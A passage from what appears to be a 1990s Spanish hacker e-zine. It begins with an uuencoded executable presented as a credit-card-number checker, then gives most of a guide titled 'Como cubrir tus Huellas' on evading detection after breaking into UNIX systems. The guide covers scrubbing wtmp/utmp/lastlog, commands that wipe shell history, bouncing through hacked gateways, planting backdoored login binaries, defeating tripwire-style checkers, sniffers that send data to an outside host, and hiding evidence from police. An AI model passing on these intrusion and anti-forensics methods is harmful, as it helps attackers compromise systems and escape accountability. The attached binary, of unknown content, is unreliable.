M\/]7C.L(*_B+QS8K1P0?B/^S_1C'C8HEF3K,$X]?S`K)=`82IG4".L1=_F^-
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
="CX8&A<5'Q,4!0\A`%0!$P`(`0#O!-P`UP<``0``
`
end
...............................Corta entre los puntos.........................

[ Este programa verifica los numeros de tarjeta que son proporcionados por
el usuario. Se ejecuta CARD.EXE y listo. Estos archivos han sido revisados
con ViruScan95 update de Mayo, PcCillin95 update #228, y F-prot 2.26 8-) ]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


øøøøøøøøøøøøøøøøøøøøøøøøøøø
ø Como cubrir tus Huellas ø
ø ß ß ß ß ß ß ß ß ß ß ø
øøøøøøøøøøøøøøøøøøøøøøøøøøø

PRIMERA PARTE: TEORIA

I. Introduccion
II. Estado Mental
III. Lo Basico
IV. Avanzado
V. Bajo Sospecha
VI. Detenido
VII. Programas

I. Introduccion
----------------------------------------------------------------------

Este texto esta dividido en 2 partes. La primera explica la teoria de borrar
las huellas en un sistema y las razones de hacerlo. La segunda te muestra
los pasos a tomar en un sistema UNIX y las cosas que debemos evitar. Si eres
muy descuidado y flojo para leer todo el articulo (estupido) entonces lee
la segunda parte.

Si piensas que conocer los exploits mas nuevos es la cosa mas importante
para hackear un sistema estas equivocado. ¨Como un exploit te va ayudar
cuando te demanden y te quiten tus cuentas y computadoras?
La cosa verdaderamente importante para hackear es no ser sorprendido.

Es la PRIMERA cosa que un hacker debe dominar, por que en muchas ocasiones,
especialmente cuando un objetivo esta constantemente vigilado debido a los
multiples ataques que haya sufrido, tu primer hack puede ser el ultimo o
si quieres aprender a limpiar tus huellas despues de aprender lo basico
sobre unix cambiar tus habitos puede resultarte dificil.
Asi que ­examina estas secciones con cuidado!
Hasta un hacker experimentado puede aprender un poco en estos bytes.

Asi que esto encontraras aqui:
Seccion I - Me estas leyendo (introduccion).
Seccion II - Las cosas mentales para convertirte paranoico.
1. Motivacion
2. Por que debes ser paranoico
3. Como convertirte en paranoico
4. Permanecer paranoico
Seccion III - Lo basico ANTES de hackear.
1. Prefacio
2. Asegurate
3. Tu propia cuenta
4. Los Registros (LOGS)
5. No dejes huella
6. Cosas que debes evitar
Seccion IV - Tecnicas avanzadas
1. Prefacio
2. Previene que te localizen
3. Encuentra y manipula los registros (logs)
4. Checa la configuracion syslog y el archivo
5. Revisa los programas de seguridad instalados
6. Checa los admins
7. Como "corregir" el software de verificacion checksum
8. Trucos de seguridad
9. Miscelanea
Seccion V - Que hacer si estas bajo sospecha
Seccion VI - Las cosas que debes y no debes hacer cuando seas
sorprendido
Seccion VII - Programas

Lean con cuidado y sean todos ustedes impresionados.

II. Mental
----------------------------------------------------------------------

* Motivacion *
El aspecto mental es la llave para ser exitoso en todo.

Es el poder de motivarte a ti mismo, luchar si duele, ser autodisciplinado,
paranoico y realista, calcular los riesgos correctamente y hacer cosas que
no te gustan pero son importantes.

Si no puedes motivarte a ti mismo para programar herramientas importantes
y esperar el momento perfecto para atacar el objetivo, entonces nunca
llegaras a ningun lado con tus "hacks".

Un hacker exitoso debe cumplir con estos requisitos mentales. Es como hacer
fisiculturismo o una dieta - puedes aprenderlo si realmente intentas.

HASTA EL MEJOR CONOCIMIENTO NO TE AYUDARA HASTA QUE ESTES REALMENTE
PREOCUPADO POR TOMAR PREVENCIONES Y DE HECHO HACERLAS.

* Por que debes ser paranoico *

Es verdad que ser paranoico normalmente no es algo que hace tu vida mas
feliz. De cualquier manera si no estas esperando lo peor, cualquier cosa
puede pasarte y perderas el balance. Y recuerda que hackear es
arriesgar mucho las cosas.
En tu vida normal no debes preocuparte mucho de policias, ladrones y cosas
de ese tipo. Pero si estas del otro lado recuerda que tu haces la vida a
otras personas dificil, les creas pesadillas y les das trabajo extra - Y
quieren detenerte.

Aunque sientas que no cometes un crimen - de hecho lo haces. Las cacerias
de hackers en Mexico no son populares pero en caso de desatarse alguna todos
nos veremos involucrados. Ademas recuerden que aqui en Mexico no existe
aquello de "culpable hasta que se demuestre lo contrario." Me ha tocado
saber de amigos mios que son sacados de la red simplemente por entablar
conversaciones por correo electronico respecto a hackear sin hacerles ningun
tipo de pregunta (vil autoritarismo).

Una vez que tengas el estigma de un hacker jamas podras quitartelo.
Una vez que estes en los records criminales es dificil conseguir trabajo.
Ninguna compa¤ia de software o relacionada con sistemas te contratara,
tendran miedo de tus aptitudes y te veras a ti mismo forzado a emigrar o tu
vida estara perdida.

­SE PARANOICO!
­PROTEGETE A TI MISMO!
­RECUERDA QUE TIENES TODO QUE PERDER!
­NUNCA TE SIENTAS TONTO DE HACER ALGO EXTRAORDINARIO PARA EVITAR QUE TE
LOCALIZEN!
­QUE NUNCA TE IMPORTE QUE OTROS SE RIAN DE TU PARANOIA!
­NUNCA SEAS LO BASTANTE FLOJO O CANSADO PARA MODIFICAR LOS REGISTROS!
­­­UN HACKER DEBE HACER SU TRABAJO AL 100%!!!

* Como convertirse en paranoico *

Si tu lees la parte de arriba y piensas que es verdad, es facil - ya estas
paranoico. Pero debe convertirse en parte sustancial de tu vida. Si logras
convertirte en un buen hacker siempre piensa en a quien decir algo, y ten
presente que tus llamadas y correos electronicos pueden ser monitoreados.
Lee y memoriza la seccion pasada.

Si lo anterior no te ha ayudado, entonces piensa en lo que te pasaria si
te encontraran culpable de "invasion a propiedad privada" y todas esas
porquerias legales. ¨Estara tu novia contigo? ¨Quieres ver a tus padres
llorar? ¨Quieres verte expulsado de la escuela/universidad/trabajo?

­No le des NINGUNA oportunidad a esto de que pase!

Si todo esto no te motiva para protegerte:
­DEJA YA DE HACKEAR!
Eres un peligro a toda la sociedad de hackers y para tus amigos !

* Permanece Paranoico *

Espero hayas entendido la razon para ser paranoico. Asi que permanece
paranoico. Un error o un momento de pereza puede ser suficiente para arruinar
tu vida o carrera.

Siempre recuerda la motivacion para hacerlo.


III. LO BASICO
----------------------------------------------------------------------

* Prefacio *

Tu debes saber esto y practicarlo antes de empezar con tu primer hack.
Existen los absolutamente basicos y sin saberlos estaras en problemas pronto.

* ASEGURATE *

¨Que tal si un administrador lee tu correo?
¨Que tal si tus llamadas son grabadas por la policia?
¨Que pasaria si la policia te quita tu computadora con toda la
informacion sobre tus hackings en ella?

Si no recibes correo sospechoso, no hablas de hack/phreak por el telefono y
no tienes archivos sensitivos en tu disco entonces no tienes de que
preocuparte. Pero eres un hacker.
Cualquier hacker necesita estar en contacto con otros y guardar sus datos en
algun lugar.

­Encripta la informacion que sea sensitiva!
Los encriptadores de disco duro son muy importantes y utiles:
Hay algunos encriptadores muy buenos disponibles en Internet como los
que mencionare:
- Si tienes MsDos obten SFS v1.17 o SecureDrive 1.4b
- Si tienes Amiga obten EnigmaII v.1.5
- Si usas Unix obten CFS v1.33

Encriptadores de Archivos: Puedes usar cualquiera, pero debe usar uno de los
bien conocidos y seguros algoritmos. NUNCA uses un programa de encripcion
que pueda ser exportado por que la efectividad de la lengitud de sus llaves
es limitada!
- Blowfish Advanced 95 (Anti-Tempest, Blowfish32, Idea, Des, etc.)
- Triple DES
- IDEA
- Blowfish (32 rounds)

­Encripta tu correo electronico!
- PGP v2.6.x es el mas usado asi que usalo tu tambien.
Encripta tus llamadas telefonicas si quieres discutir cosas importantes.
-PGPFONE es muy bueno.
-Nautilus v1.5a es uno de los mejores.
Encripta tus sesiones de terminal cuando te conectes a un sistema UNIX.
Alguien puede estar haciendo sniffing, o monitoreando tu linea.
- SSH es el mas seguro.
- DES-Login es bastante bueno.

Usa fuertes passwords que no puedan ser adivinados y que no sean mencionados
en ningun diccionario. Ellos deben ser al hazar pero facil de recordar para
ti. Si la llave puede ser mayor de 10 caracteres, usa esa y escoge una
sentencia de un libro ligeramente modificada.
Encripta los numeros telefonicos de tus amigos dos veces. Y llamales desde
telefonos publicos/oficina/etc. solo si no encriptas la llamada.

El principiante solo necesita PGP, un encriptor de archivos y un encriptor
de disco duro. Si estas realmente hundido en el hacking como nosotros
recuerda encriptar TODO.

Realiza un respaldo de tu informacion (Zip-Drive, otro disco duro, CD, Tape)
encriptada desde luego y guardala donde no pueda encontrarse relacion con
equipo de computadoras o contigo. En caso de incendio o que lleguen a tu
casa a quitarte tus datos no tendras que empesar de cero.

Manten solo las necesarias notas escritas mientras las necesites. No mas
tiempo. Guardarlas encriptadas es mucho mas seguro. Quema los papeles cuando
ya no los necesites. Tu puedes crear notas con un algoritmo de encripcion
que solo tu conozcas, no le digas a nadie de tu algoritmo y no lo uses para
textos largos por que puede ser facilmente analizado y quebrado.

Los verdaderamente ultra-extremadamente-archi-super paranoicos deben
considerar tambien el proyecto TEMPEST. Policias, espias y hackers pueden
monitorear todas tus acciones. Una persona bien equipada puede obtener
*TODO* lo que quiera : La emanacion de pulsos electronicos pueden ser
obtenidos a mas de 100 metros de distancia y muestran la pantalla de tu
monitor a cualquier persona, un apuntador laser a traves de tu ventana
podria escuchar tus conversaciones y un identificador de se¤ales de alta
frecuencia podria marcar todas las teclas que alguien presiona .... Las
posibilidades de este ataque son infinitas y aparatos como los jammers
(interruptores) de se¤ales electronicas estan en el mercado para prevenir
que seas una victima de un ataque de este tipo.

* TU PROPIA CUENTA *

Ahora vamos hablar de tu cuenta propia. Esta es tu cuenta real que obtuviste
en tu escuela/universidad/trabajo/proveedor y esta asociada con tu nombre.
Nunca olvides seguir estas reglas cuando uses tu cuenta:

Nunca hagas algo ilegal o sospechoso con tu cuenta real.
Ni siquiera hagas Telnet a un host para hackear de tu cuenta.
Leer las listas de correo sobre seguridad usando tu cuenta esta bien.
Pero *TODO* lo que *PAREZCA* que tenga que ver con hacking debera estar
encriptado o borrado.
Nunca dejes/salves herramientas para hackear en el espacio de tu cuenta.
Si puedes usa POP3 para conectarte al servidor de correo y obtener+borrar
tu correo (o realizalo de otra manera si tienes experiencia en UNIX)
Nunca proporciones tu direccion verdadera de email si tu nombre esta
en ella o en el espacio de informacion (GECO) de cada usuario.
Has saber tu verdadera direccion solo a personas que puedas confiar y
que esten concientes de la seguridad por que si los agarran a ellos
tu podrias ser el siguiente.
Si vas a usar tu cuenta para intercambiar informacion asegurate de usar
PGP ya que los administradores tienden a ser un poco espias (metiches).
Nunca uses tu cuenta de una manera que muestre que tienes interes en
hacking. El interes en la seguridad es OK pero nada mas.

* LOS REGISTROS *

En la mayoria de los sistemas existen 3 archivos de registro importantes:
WTMP - Todas las entradas/salidas mas tty y host.
UTMP - Quien esta en linea en el momento.
LASTLOG - De donde vinieron los logins.

Existen otros, pero esos seran discutidos en la seccion avanzada. Todos los
logins via telnet, ftp, rlogin y en algunos otros sistemas rsh son escritos
a estos logs. Es MUY importante que te borres de estos archivos si estas
hackeando por que de otra manera:
a) pueden ver desde donde hiciste el hacking
b) desde que host llegaste
c) sabran cuanto tiempo estuviste en linea y calcularan el impacto

­NUNCA BORRES LOS LOGS! Es la forma mas facil de mostrar a el administrador
que un hacker estuvo en la maquina. Obten un buen programa para modificarlos.
ZAP -RareGaZz #3- (o ZAP2) es mencionado como el mejor - pero no lo es. Lo
unico que hace es sobre escribir la informacion de la ultima persona que
entro con ceros. CERT ya saco un simple programa que checa por esos ceros
en los logs asi que esa es una forma facil de revelar la presencia de un
hacker tambien. De nada sirve hackear R00T si cuando se de cuenta el admin
todo tu trabajo no servira de nada!
Otra cosa importante de ZAP es que no funciona si no encuentra los archivos
con los registros; asi que ­checa los paths antes de compilar!
Obten un programa que CAMBIE la informacion (CLOAK2) o uno bueno que BORRE
la entrada (CLEAR).

Normalmente uno debe ser r00t para modificar los registros. Pero si no
lograste hackear el r00t ¨que puedes hacer? No mucho:
Has un rlogin a la computadora en la que estes, para a¤adir un nuevo y no
sospechoso LASTLOG que sera mostrado al administrador cuando entre la
proxima vez.
Asi el no se pondra nervioso cuando vea "localhost".
Muchas distribuciones de UNIX tienen un Bug con el comando Login. Cuando
lo ejecutas sobre escribe el campo login en UTMP (­El que muestra el host
de donde vienes!) con tu tty.

Los registros por default estan localizados en estos directorios:

UTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log
WTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log
LASTLOG : /usr/var/adm o /usr/adm o /var/adm o /var/log

* NO DEJES HUELLA *

Varios hackers se borran de los logs pero se olvidan de borrar otras cosas
como archivos en /tmp y $HOME

Shells
Algunas shells dejan un archivo de registro(dependiendo de la configuracion)
con todos los comandos que el usuario usa. Eso es muy malo para un hacker.
La mejor alternativa es empezar un nuevo shell como tu primer comando despues
de entrar y checar cada vez por un archivo de historia en tu $HOME.
Archivos de historia de comandos:

Shell - Archivo
sh : .sh_history
csh : .history <--- Cincos, Telnor, Microsol, Compunet, orca.etc..
ksh : .sh_history
bash: .bash_history
zsh : .history

En otras palabras: ejecuta "ls -altr" antes de irte!

Aqui hay 4 comandos csh que borraran el archivo .history cuando salgas
del sistema para no dejar huella.

mv .logout save.1
echo rm .history>.logout
echo rm .logout>>.logout
echo mv save.1 .logout>>.logout


* COSAS QUE DEBES EVITAR *

No rompas passwords en otras maquinas que no sea la propia, y desde luego
hazlo en un disco encriptado. Nota que tambien puedes encriptar una
particion de tu disco unicamente.
Si tratas de romper passwords en la universidad por ejemplo y el r00t
observa el proceso no solo tu cuenta es historia sino tambien el sitio de
donde es el archivo con los passwords.
Obten el passwd (en estos dias el shadow :-) y crackealo en una segunda
computadora o en un proceso background. Tu no necesitas muchas cuentas de
un sitio, solo unas pocas.

Si ejecutas programas importante como ypx, iss, satan o programas para
explotar sistemas renombralos antes de ejecutarlos. Y desde luego no uses
parametros en la linea de comandos si el programa soporta modo interactivo
como telnet.
Escribe "telnet" y abre "open target.host.com" ... que no mostrara el host
objetivo en el proceso como parametro.

Si hackeas algun sistema no pongas una shell suid en ningun lado! Es mejor
tratar de instalar algunas puertas traseras como ping, quota o login y
usar fix para corregir el atime y mtime de el archivo si no tienes otra
posibilidad.


IV. Tecnicas Avanzadas
----------------------------------------------------------------------

* PREFACIO *

Una vez que hayas instalado tu primer sniffer y comienzes a hackear por
el mundo entero entonces debes saber estas tecnicas.

* PREVIENE QUE TE LOCALICEN *

En ocasiones tus hacks seran notados. Eso no es ningun problema real si el
operador del sistema no esta interesado en perseguir los hackers que jueguen
con su sistema, pero si se deciden a encontrarte entonces empiezan los
problemas.

Este corto capitulo te explicara todas las posibilidades que ELLOS tienen
para encontrarte y que posibilidades tienes tu de prevenir eso.

* Normalmente *no* sera problema para el administrador identificar a el
hacker del sistema si:
1) checan las entradas del registro si el hacker fue peresozo.
2) si el hacker tiene instalado un sniffer checando el output que este
produce donde aparecera informacion del hacker.
3) si usan software de auditoria como loginlog
4) usando el comando "netstat" cuando el hacker se encuentre en linea.

Debes esperar que un operador de sistemas se entere de tu procedencia, es
eso por lo que necesitas un servidor gateway.

* Un gateway entre los dos - ¨Que es eso?
Es un servidor como KillerBot los mencionoen el numero 3 de la revista
"condon" en donde tengas acceso root para alterar los archivos wtmp y
lastlog.

* El servidor origen del ataque *
Desde este servidor haras tu hacking. Telnet (o mejor: remsh/rsh) a una
maquina gateway y luego al objetivo.
Necesitas acceso root para cambiar los logs.
Necesitaras cambiar el servidor desde que hackeas cada 2-4 semanas.

* Tu acceso Dial-Up a Internet *
Este es el punto mas critico. Una vez que hayan localizado la maquina
que usas para accesar a Internet estas frito.
Tu *NO* necesitas ser r00t en un host que uses para entrar a Internet. Como
a estos te conectas via modem ahi no existen logs que deban ser modificados.
Deberas usar una cuenta diferente para entrar a el host cada dia, y tratar
de usar aquellas que son mas usadas.
No modifiques el sistema de ninguna manera.
Necesitas tener por lo menos 2 host para accesar a Internet y cambiarlos cada
mes o dos.

# Conclusion: Si tu hackeas otras cosas que universidades entonces necesitas
hacerlo de esta forma! Aqui esta un esquema para ayudarte ;-)

+-------+ ~---------------> +-------------+ +-----------+
|+-----+| > Un metodo para> |Uno de por lo| |Un servidor|
|| TU || --> > hacer segura > --> |menos 3 hosts| --> |desde donde|
|+-----+| > la llamada. > |de proteccion| |hackear. |
+-------+ ~---------------> +-------------+ +-----------+
|
|
v
+--------+ +-------------+
| EL | |Un servidor |
|OBJETIVO| <-- |hackeado como|
| | | gateway |
+--------+ +-------------+

* 3. Encuentra y manipula los registros *

Es importante que encuentres todos los archivos de registro - hasta los
escondidos. Para encontrar todos los tipos de registros existen dos
faciles posibilidades.

1) Encuentra todos los archivos abiertos.
Como todos los archivos de registro deben ser escritos en algun lado,
obten el programa LSOF - LiSt Open Files - para verlos ... checalos ...
y si es necesario corrigelos.

2) Busca todos los archivos modificados despues de que entraste. Despues de
que entres a un sistema usa el comando "touch /tmp/check" despues trabaja.
Luego usa el comando "find / -newer /tmp/check -print" y revisa si alguno
de esos archivos son de auditoria. observa>revisa>corrige.
Nota que no todos los sistemas y versiones soportan la opcion -newer
Tu tambien puedes hacer un "find / -ctime 0 -print" o
"find / -cmin 0 -print" para encontrar los registros.

Revisa todos los registros que encuentres. Normalmente los registros
estaran en /usr/adm, /var/adm o /var/log.
Si cosas se registran a @loghost entonces estas en problemas. Tu
necesitas hackear la maquina loghost para modificar los logs.

Para manipular los logs puedes hacer "grep -v", o un conteo de lineas con
wc, y luego cortar las 10 ultimas con "head -LineNumbersMinus10" o usar
un editor etc.
Si los archivos de registro/auditoria no son archivos de texto sino de datos
identifica el software que escribe los registros. Despues consigue el codigo
fuente. Despues encuentra el encabezado que defina la estructura del archivo.
Obten zap, clear, cloak etc. y re-programa los codigos con los encabezados
del archivo a usar con este tipo especial de archivos de registro (y despues
pasalo a la comunidad del hacking).

Si un programa de auditoria esta instalado necesitaras el acct-cleaner de
zhart, funciona muy bien!

Un peque¤o truco para modificar wtmp es necesario si no puedes compilar
ningun codigo fuente, perl, etc. Funciona en sistemas Sun pero no en Linux:
Has uuencode de wtmp. Ejecuta vi, ve al final del archivo y borra las
ultimas 4 lineas que comienzen con "M" ... despues salvalo y sal., uudecode
y las ultimas 5 entradas al wtmp estaran borradas ;-)

Si el sistema usa wtmpx y utmpx entonces estas en problemas ... Hasta ahora
no conozco ningun programa que pueda modificarlos.

* 4. Checa la configuracion syslog y el archivo *

La mayoria de los programas usan syslog para registrar lo que quieren. Es
importante revisar la configuracion donde syslog imprimira los mensajes.

El archivo de configuracion es /etc/syslog.conf - la descripcion de cada
entrada en ese archivo NO seran explicadas en este texto. Lee algun otro
archivo que trate ese tema en especial ;-). Los tipos de archivos y entradas
importantes son kern.*, auth.* y authpriv.*

Fijate donde se escriben esos archivos: los archivos pueden ser modificados.
Si han sido mandados a otro servidor deberas hackear ese tambien. Si los
mensajes son enviados a un usuario, tty y/o consola puedes hacer un peque¤o
truco para generar falsos mensajes de registro como ""echo 17:04 12-05-85
kernel sendmail[243]: can't resolve bla.bla.com > /dev/console" o cualquier
consola que quieras inundar para que el mensaje que desees esconder
simplemente se esconda entre los demas.
Los archivos de registro son *MUY* importantes! Revisalos.

* Revisa los programas de seguridad instalados *

En los sitios conscientes de seguridad, existen algunos chequeadores de
seguridad que son ejecutados por cron. El directorio normal para los
crontabs son /var/spool/cron/contabs
Revisa todas las entradas, especialmente las de el archivo "root" y examina
los archivos que ejecuta. Para una investigacion rapida de los crontabs del
root escribe "crontab -l root".

Algunas de estas herramientas de seguridad son instaladas por las cuentas
administrativas. Algunas de ellas (peque¤as utilidades para revisar wtmp,
y si un sniffer esta instalado) estan en ~/bin.
Lee abajo para identificar estos admins y revisar sus directorios.

El software de chequeo interno puede ser tiger, cops, spi, tripwire, l5,
binaudit, hobgoblin, s3 etc.

Debes examinar lo que reportan y si ellos reportan algo eso seria un signo
de alerta de tus hacks.
Si ese software reporta acciones sospechosas puedes:
- Actualizar los archivos de datos del programa (modo aprendizaje) para
que no reporte ese tipo de ataques.
- Reprogramar/modificar el software para que no reporten las acciones
sospechosas.

* 6. Checa los admins *

Es importante para ti que revises las medidas que los sysops toman si es
que las toman. - asi que primero necesitas saber las cuentas que normalmente
utilizan.
Puedes revisar el archivo .forward de root y revisar la entrada alias del
root. Tambien revisa el archivo passwd por "admin" para que revele a los
administradores.

Ahora debes saber los 1-6 administradores en las maquinas que esten. Cambia
los directorios (usa chid.c, changeid.c o algun script similar para
convertirte en ese usuario si el root no tiene derechos a leer cada archivo)
y revisa sus archivos .history/.sh_history/.bash_history para ver que
comandos usan. Checa sus archivos .profile/.login/.bash_profile para ver
que alias tienen en sus chequeos de seguridad. Examina sus directorios
~/bin! La mayoria del tiempo los programas de seguridad son puestos en ese
directorio! Y desde luego echa un vistazo a cada directorio que ellos
tengan con el comando "ls-alR ~/".

Si encuentras programas de seguridad, lee 5.) para las posibilidades de
sobrepasar esas protecciones.

* 7. Como "corregir" el software de verificacion checksum *

Algunos administradores le temen a los hackers e instalan software para
detectar cambios en sus valiosos binarios. Si un binario es modificado,
la proxima vez que el administrador haga un chequeo sera detectado.

Asi que como necesitas saber ¨como puedes a)encontrar que chequeadores de
binarios estan instalados y b) como modificarlos para que puedas plantar un
caballo de troya?

Nota que existen muchos chequeadores de archivos binarios y que es muy facil
escribir alguno - toma 15 minutos - y puede ser realizado con un peque¤o
script. Asi que es dificil encontrar este tipo de software si es que esta
instalado.
Estos son algunos de los programas mas usados:

SOFTWARE : PATH STANDARD : NOMBRE DE LOS ARCHIVOS BINARIOS
tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire
binaudit : /usr/local/adm/audit : auditscan
hobgoblin : ~user/bin : hobgoblin
raudit : ~user/bin : raudit.pl
l5 : directorio para compilar : l5

Como puedes ver hay demasiadas posibilidades! El software o base de datos
podria estar en un disco no montado en el sistema o en una particion de
otro host. O la base de datos con los checksums podria estar en un medio
protegido fisicamente. En el caso de que encuentres un sistema de seguridad
de este tipo lo mejor es no modificar los archivos binarios.

* 8. Trucos de seguridad *
Esto es una cosa rara de hacer y solo es necesario revisar para hacer un buen
trabajo. Algunos usuarios, llamados administradores y hackers, usualmente no
quieren que sus cuentas sean usadas por otras personas. Es por eso que ponen
seguridad en sus archivos de inicio.
Asi que revisa todos los archivos de puntos (.profile, .cshrc, .login,
.logout etc.) y que comandos ejecutan, que registros tienen y cual es
el path de busqueda establecido. Si por ejemplo $HOME/bin viene antes de
/bin en el path de busqueda deberas revisar los contenidos de ese directorio
... quizas exista un programa llamado "ls" o "w" instalado que registra la
ejecucion antes de ejecutar el verdadero programa.

Tambien revisa automaticamente los archivos wtmp y lastlog para ver si ha
sido ejecutado zap, si han sido manipulados los archivos .rhosts y
.Xauthority, sniffers activos, etc.

­Nunca te metas con cuentas que un 'Mago' de unix este usando!

* 9. Miscelanea *

Estas son algunas cosas en las que debes poner atencion.

Los clientes Telnet viejos exportan la variable USER. Un administrador
que conozca eso y modifique el telnetd puede obtener todos los nombres de
usuario e identificar desde que cuenta estas hackeando cuanto se de cuenta
de tu presencia.
Los nuevos clientes han sido arreglados - pero el administrador inteligente
tiene otras formas de localizarte: las variables UID, MAIL y HOME son
exportadas y hacen la identificacion de la cuenta usada por el hacker
facilmente. Antes de hacer un Telnet, cambia las variables USER, UID, MAIL y
HOME, quizas hasta la variable PWD si estas en el directorio Home.

En los sistemas HP-UX <v10 puedes crear directorios escondidos. No estoy
hablando acerca de los archivos de punto . o similares sino de un atributo.
HP introdujo esta opcion en la version 9 pero fue removida en la 10 (debido
a que era usada solo por hackers ;-). Si haces un "chmod +H directorio" es
invisible a el comando "ls -al". Para ver los directorios escondidos
necesitas usar el switch -H ejemplo: "ls -alH"

Cuando necesites modificar la fecha de un archivo recuerda que usando el
comando "touch" puedes cambiar el atime y mtime.

Si instalas un sniffer y es un sistema importante, entonces necesitas
asegurarte de ofuscar la salida (output) del sniffer (con un algoritmo de
encripcion o dejar que el sniffer envie toda la informacion capturada por
via icmp o udp a un host externo bajo tu control). ¨Por que? Si el
administrador del sistema se entera del sniffer (cpm y otro software
checando por sniffers) no podran identificar en el archivo de registro que
informacion fue obtenida, asi que no podra avisar a otros hosts sobre tu
presencia.



V. BAJO SOSPECHA
----------------------------------------------------------------------

Una vez que estes bajo sospecha (policia o algun administrador) tu deberas
tomar acciones especiales para que no tengan evidencia en contra tuya.

NOTA: Si los administradores de algun sistema piensan que eres un hacker,
ERES CULPABLE HASTA

  
DEMOSTRAR TU INOCENCIA

Las leyes no significan nada a los administradores (a veces pienso que la
diferencia entre un hacker y un administrador es que solo la computadora
pertenece a ellos). Cuando ellos piensen que eres un hackers, eres culpable
si no tienes un abogado que hable por ti. Ellos tendran que monitorear tu
e-mail, archivos y si son lo suficientemente buenos, las teclas que presiones
tambien.

Cuando la policia esta involucrada, tu linea telefonica puede ser monitoreada
tambien y una emboscada puede venir pronto.

Si te das cuenta o temes que estes bajo sospecha entonces manten un perfil
bajo! No accion ofensiva debe ser tomada que apunte al hacking.

La mejor cosa es esperar por lo menos 1 o 2 meses sin hacer nada. Avisa a
tus amigos que no envien correo, si el correo que recibes esta encriptado
con PGP solo alertaras a los administradores.
Recuerda encriptar toda tu informacion sensitiva y remover todos los papeles
con informacion sobre cuentas, numeros telefonicos, etc. Esas son las cosas
mas importantes que los administradores y policias buscaran cuando entren a
tu casa.

VI. DETENIDO
----------------------------------------------------------------------

